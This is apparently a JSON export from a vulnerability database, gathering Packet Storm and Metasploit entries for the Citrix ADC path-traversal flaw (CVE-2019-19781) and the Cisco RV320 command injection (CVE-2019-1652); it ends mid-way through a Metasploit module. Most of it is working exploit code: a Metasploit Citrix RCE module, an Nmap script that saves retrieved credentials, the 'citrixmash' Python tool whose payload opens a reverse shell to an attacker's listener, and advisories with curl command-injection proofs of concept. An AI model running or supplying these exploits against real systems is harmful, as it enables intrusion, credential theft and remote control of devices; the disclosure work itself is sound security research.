\n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal', \n'HttpClientTimeout' => 3.5 \n}, \n'Notes' => { \n'AKA' => ['Shitrix'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' 
=> [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef exploit \nunless datastore['ForceExploit'] \ncase check \nwhen CheckCode::Vulnerable \nprint_good('The target appears to be vulnerable') \nwhen CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable') \nelse \nfail_with(Failure::Unknown, 'The target vulnerability state is unknown') \nend \nend \n \nprint_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \ncase target['Type'] \nwhen :python \nexecute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\")) \nwhen :unix_command \nif (res = execute_command(payload.encoded)) && cmd_unix_generic? \nprint_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, '')) \nend \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nfilename = rand_text_alpha(8..42) \nnonce = rand_text_alpha(8..42) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'), \n'headers' => { \n'NSC_USER' => \"../../../netscaler/portal/templates/#(unknown)\", \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => rand_text_alpha(8..42), \n'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\" \n} \n) \n \nunless res && res.code == 200 \nprint_error('No response to POST newbm.pl request') \nreturn \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#(unknown).xml\"), \n'headers' => { \n'NSC_USER' => rand_text_alpha(8..42), \n'NSC_NONCE' => nonce \n}, \n'partial' => true \n) \n \nunless res && res.code == 200 
\nprint_warning(\"No response to GET #(unknown).xml request\") \nend \n \nregister_files_for_cleanup( \n\"/netscaler/portal/templates/#(unknown).xml\", \n\"/var/tmp/netscaler/portal/templates/#(unknown).xml.ttc2\" \n) \n \nres \nend \n \ndef chr_payload(cmd) \ncmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155947/citrix_dir_traversal_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-16T22:49:44", "description": "", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "packetstorm", "title": "Citrix ADC / Gateway Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "PACKETSTORM:155972", "href": "https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "sourceData": "`# Exploit Title: Path Traversal in Citrix Application Delivery Controller \n(ADC) and Gateway. 
\n# Date: 17-12-2019 \n# CVE: CVE-2019-19781 \n# Vulnerability: Path Traversal \n# Vulnerability Discovery: Mikhail Klyuchnikov \n# Exploit Author: Dhiraj Mishra \n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 \n# Vendor Homepage: https://www.citrix.com/ \n# References: https://support.citrix.com/article/CTX267027 \n# https://github.com/nmap/nmap/pull/1893 \n \nlocal http = require \"http\" \nlocal stdnse = require \"stdnse\" \nlocal shortport = require \"shortport\" \nlocal table = require \"table\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \nlocal io = require \"io\" \n \ndescription = [[ \nThis NSE script checks whether the target server is vulnerable to \nCVE-2019-19781 \n]] \n--- \n-- @usage \n-- nmap --script https-citrix-path-traversal -p <port> <host> \n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args \noutput='file.txt' \n-- @output \n-- PORT STATE SERVICE \n-- 443/tcp open http \n-- | CVE-2019-19781: \n-- | Host is vulnerable to CVE-2019-19781 \n-- @changelog \n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) \n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) \n-- @xmloutput \n-- <table key=\"NMAP-1\"> \n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem> \n-- <elem key=\"state\">VULNERABLE</elem> \n-- <table key=\"description\"> \n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, \n11.1, 12.0, 12.1, and 13.0 are vulnerable to an unauthenticated path \n-- traversal vulnerability that allows attackers to read configurations or \nany other file. 
\n-- </table> \n-- <table key=\"dates\"> \n-- <table key=\"disclosure\"> \n-- <elem key=\"year\">2019</elem> \n-- <elem key=\"day\">17</elem> \n-- <elem key=\"month\">12</elem> \n-- </table> \n-- </table> \n-- <elem key=\"disclosure\">17-12-2019</elem> \n-- <table key=\"extra_info\"> \n-- </table> \n-- <table key=\"refs\"> \n-- <elem>https://support.citrix.com/article/CTX267027</elem> \n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> \n-- </table> \n-- </table> \n \nauthor = \"Dhiraj Mishra (@RandomDhiraj)\" \nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"discovery\", \"intrusive\",\"vuln\"} \n \nportrule = shortport.ssl \n \naction = function(host,port) \nlocal outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil \nlocal vuln = { \ntitle = 'Citrix ADC Path Traversal', \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, \n12.1, and 13.0 are vulnerable \nto a unauthenticated path traversal vulnerability that allows attackers to \nread configurations or any other file. 
\n]], \nreferences = { \n'https://support.citrix.com/article/CTX267027', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', \n}, \ndates = { \ndisclosure = {year = '2019', month = '12', day = '17'}, \n}, \n} \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal path = \"/vpn/../vpns/cfg/smb.conf\" \nlocal response \nlocal output = {} \nlocal success = \"Host is vulnerable to CVE-2019-19781\" \nlocal fail = \"Host is not vulnerable\" \nlocal match = \"[global]\" \nlocal credentials \nlocal citrixADC \nresponse = http.get(host, port.number, path) \n \nif not response.status then \nstdnse.print_debug(\"Request Failed\") \nreturn \nend \nif response.status == 200 then \nif string.match(response.body, match) then \nstdnse.print_debug(\"%s: %s GET %s - 200 OK\", \nSCRIPT_NAME,host.targetname or host.ip, path) \nvuln.state = vulns.STATE.VULN \ncitrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname \nor host.ip,port.number, path)) \nif outputFile then \ncredentials = response.body:gsub('%W','.') \nvuln.check_results = stdnse.format_output(true, citrixADC) \nvuln.extra_info = stdnse.format_output(true, \"Credentials are being \nstored in the output file\") \nfile = io.open(outputFile, \"a\") \nfile:write(credentials, \"\\n\") \nelse \nvuln.check_results = stdnse.format_output(true, citrixADC) \nend \nend \nelseif response.status == 403 then \nstdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname \nor host.ip, path, response.status) \nvuln.state = vulns.STATE.NOT_VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155972/cadcg-traversal.nse.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal", 
"bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155905", "href": "https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "sourceData": "`#!/usr/bin/python3 \n# \n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \n# \n# You only need a listener like netcat to catch the shell. \n# \n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White \n# \n# Tool Written by: Rob Simon and David Kennedy \n \nimport requests \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings \nimport random \nimport string \nimport time \nfrom random import randint \nimport argparse \nimport sys \n \n# random string generator \ndef randomString(stringLength=10): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \n# our random string for filename - will leave artifacts on system \nfilename = randomString() \nrandomuser = randomString() \n \n# generate random number for the nonce \nnonce = randint(5, 15) \n \n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script \n# note that the file location will be in /netscaler/portal/templates/filename.xml \ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): \n \n# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) \nencoded = \"\" \ni=0 \ntext = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport)) \nwhile i < len(text): \nencoded = encoded + \"chr(\"+str(ord(text[i]))+\") . 
\" \ni += 1 \nencoded = encoded[:-3] \npayload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\" \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \ndata = ( \n{ \n\"url\" : \"127.0.0.1\", \n\"title\" : payload, \n\"desc\" : \"desc\", \n\"UI_inuse\" : \"a\" \n}) \n \nurl = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport)) \nrequests.post(url, data=data, headers=headers, verify=False) \n \n# this is our second stage that triggers the exploit for us \ndef stage2(filename, randomuser, nonce, victimip, victimport): \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '%s' % (randomuser), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \nrequests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False) \n \n \n# start our main code to execute \nprint(''' \n \n.o oOOOOOOOo OOOo \nOb.OOOOOOOo OOOo. oOOo. .adOOOOOOO \nOboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO \nOOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB' \n`O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo \n.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO \nOOOOO '\"OOOOOOOOOOOOOOOO\"` oOO \noOOOOOba. .adOOOOOOOOOOba .adOOOOo. \noOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO \nOOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO \n\"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\" \nY 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` \n: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . \n. oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo \n'%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO': \n`$\" `OOOO' `O\"Y ' `OOOO' o . \n. . OP\" : o . 
\n: \n \nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \nTool Written by: Rob Simon and Dave Kennedy \nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com \nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \n \nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used \nto append files in an XML format to the victim machine. This in turn allows for remote code execution. \n \nBe sure to cleanup these two file locations: \n/var/tmp/netscaler/portal/templates/ \n/netscaler/portal/templates/ \n \nUsage: \n \npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''') \n \n# parse our commands \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\") \nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\") \nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\") \nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\") \nargs = parser.parse_args() \nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\") \nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename)) \n# trigger our first post \nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) \nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\") \ntime.sleep(2) \nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\") \nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\") \nprint(\"[!] 
Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\") \n# trigger our second post \nstage2(filename, randomuser, nonce, args.target, args.targetport) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155905/citrix-traversalexec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-03-28T22:53:28", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1652"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152262", "href": "https://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html", "sourceData": "`Advisory: Cisco RV320 Command Injection \n \nRedTeam Pentesting discovered a command injection vulnerability in the \nweb-based certificate generator feature of the Cisco RV320 router which \nwas inadequately patched by the vendor. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 through 1.4.2.20 \nFixed Versions: none \nVulnerability Type: Remote Code Execution \nSecurity Risk: medium \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject \nVendor Status: working on patch \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005 \nAdvisory Status: published \nCVE: CVE-2019-1652 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. 
The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe router's web interface enables users to generate new X.509 \ncertificates directly on the device. Previously, RedTeam Pentesting \nidentified a vulnerability (rt-sa-2018-004) [2] in this component. By \nproviding a specially crafted common name, it was possible to inject \nshell commands which were subsequently executed on the router as the \nroot user. This vulnerability was addressed in firmware version 1.4.2.19 \npublished by Cisco [3]. \n \nRedTeam Pentesting discovered that the certificate generator in the patched \nfirmware is still vulnerable. The update adds several filters to handle \nsingle quotes in user input. However, these filters can be evaded by \nspecially crafted inputs. By providing the following string for the \ncertificate's common name, a \"ping\" command can be injected: \n \n------------------------------------------------------------------------ \n'a$(ping -c 4 192.168.1.2)'b \n------------------------------------------------------------------------ \n \n \nProof of Concept \n================ \n \nThe following HTTP POST request invokes the certificate generator \nfunction and triggers the command injection. It requires a valid session \ncookie for the device's web interface. The user agent \"curl\" is \nblacklisted by the firmware and must be adjusted in the HTTP client. 
\n \n------------------------------------------------------------------------ \n$ curl -s -k -A kurl -X POST -b \"$COOKIE\" \\ \n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\ \n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\ \n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\ \n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\ \n\"SelectSubject_s=1\" \\ \n--data-urlencode \"common_name='a\\$(ping -c 4 192.168.1.2)'b\" \\ \n\"https://192.168.1.1/certificate_handle2.htm?type=4\" \n------------------------------------------------------------------------ \n \nAfterwards, the incoming ICMP echo requests can be observed on the \nattacker's system at 192.168.1.2. \n \n \nWorkaround \n========== \n \nPrevent untrusted users from using the router's web interface. \n \n \nFix \n=== \n \nNone \n \n \nSecurity Risk \n============= \n \nThe vulnerability allows attackers with administrative access to the \nrouter's web interface to execute arbitrary operating system commands on \nthe device. Because attackers require valid credentials to the web \ninterface, this vulnerability is only rated as a medium risk. 
\n \n \nTimeline \n======== \n \n2018-09-19 Original vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-16 List of affected versions provided by vendor \n2019-01-22 Firmware 1.4.2.20 released by vendor \n2019-01-23 Advisory (rt-sa-2018-004) published \n \n2019-02-07 Incomplete mitigation of vulnerability identified \n2019-02-08 Proof of concept sent to vendor \n2019-02-08 Receipt of proof of concept acknowledged by vendor \n2019-02-15 Full advisory sent to vendor \n2019-02-15 Notified vendor of disclosure date: 2019-03-27 \n2019-03-25 Requested progress update from vendor \n2019-03-25 Vendor requests postponed disclosure \n2019-03-25 Postponement declined \n2019-03-27 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004 \n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. 
\n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152262/rt-sa-2019-005.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-29T02:48:43", "description": "", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1652"], "modified": "2019-01-24T00:00:00", "id": "PACKETSTORM:151313", "href": "https://packetstormsecurity.com/files/151313/Cisco-RV320-Command-Injection.html", "sourceData": "`Advisory: Cisco RV320 Command Injection \n \nRedTeam Pentesting discovered a command injection vulnerability in the \nweb-based certificate generator feature of the Cisco RV320 router. 
\n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 and later \nFixed Versions: since 1.4.2.20 \nVulnerability Type: Remote Code Execution \nSecurity Risk: medium \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004 \nAdvisory Status: published \nCVE: CVE-2019-1652 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe router's web interface enables users to generate new X.509 \ncertificates directly on the device. A user may enter typical \nconfiguration parameters required for the certificate, such as \norganisation, the common name and so on. In order to generate the \ncertificate, the device uses the command-line program openssl [2]. The \ndevice's firmware uses the following format string to assemble the \nopenssl command: \n \n------------------------------------------------------------------------ \nopenssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1 \n------------------------------------------------------------------------ \n \nAlthough the web interface filters certain special characters via \nJavaScript, there is actually no input filtering, escaping or encoding \nhappening on the server. This allows attackers to inject arbitrary \ncommands. 
\n \n \nProof of Concept \n================ \n \nEven though all components of the subject seem to be vulnerable to \ncommand injection, the following example uses the common name to trigger \na ping command: \n \n------------------------------------------------------------------------ \na'$(ping -c 4 192.168.1.2)'b \n------------------------------------------------------------------------ \n \nThe following HTTP POST request invokes the certificate generator \nfunction and triggers the command injection. It requires a valid session \ncookie for the device's web interface. \n \n------------------------------------------------------------------------ \ncurl -s -b \"$COOKIE\" \\ \n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\ \n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\ \n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\ \n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\ \n\"SelectSubject_s=1\" \\ \n--data-urlencode \"common_name=a'\\$(ping -c 4 192.168.1.2)'b\" \\ \n\"http://192.168.1.1/certificate_handle2.htm?type=4\" \n------------------------------------------------------------------------ \n \nAfterwards, the incoming ICMP echo requests can be observed on the \nattacker's system at 192.168.1.2. \n \n \nWorkaround \n========== \n \nPrevent untrusted users from using the router's web interface. \n \n \nFix \n=== \n \nInstall firmware version 1.4.2.20 (or later) on the router. \n \n \nSecurity Risk \n============= \n \nThe vulnerability allows attackers with administrative access to the \nrouter's web interface to execute arbitrary operating system commands on \nthe device. Because attackers require valid credentials to the web \ninterface, this vulnerability is only rated as a medium risk. 
\n \n \nTimeline \n======== \n \n2018-09-19 Vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-16 List of affected versions provided by vendor \n2019-01-23 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://wiki.openssl.org/index.php/Command_Line_Utilities \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 
25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151313/rt-sa-2018-004.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2022-06-24T09:00:17", "description": "This exploit module combines an information disclosure (CVE-2019-1653) and a command injection vulnerability (CVE-2019-1652) together to gain unauthenticated remote code execution on Cisco RV320 and RV325 small business routers. Can be exploited via the WAN interface of the router. Either via HTTPS on port 443 or HTTP on port 8007 on some older firmware versions.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-02-25T14:51:05", "type": "metasploit", "title": "Cisco RV320 and RV325 Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-LINUX-HTTP-CISCO_RV32X_RCE-", "href": 
"https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::CmdStager\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\",\n 'Description' => %q{\n This exploit module combines an information disclosure (CVE-2019-1653)\n and a command injection vulnerability (CVE-2019-1652) together to gain\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\n routers. Can be exploited via the WAN interface of the router. Either via HTTPS\n on port 443 or HTTP on port 8007 on some older firmware versions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'RedTeam Pentesting GmbH', # Discovery, Metasploit\n 'Philip Huppert', # Discovery\n 'Benjamin Grap' # Metasploit\n ],\n 'References' => [\n [ 'CVE','2019-1653' ],\n [ 'CVE','2019-1652' ],\n [ 'EDB','46243' ],\n [ 'BID','106728' ],\n [ 'BID','106732' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]\n ],\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'LINUX MIPS64',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPS64\n }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\"\n },\n 'CmdStagerFlavor' => [ 'bourne' ],\n 'Privileged' => true,\n 'DisclosureDate' => '2018-09-09',\n 'DefaultTarget' => 0))\n\n register_options([\n Opt::RPORT(8007), # port of Cisco webinterface\n OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! 
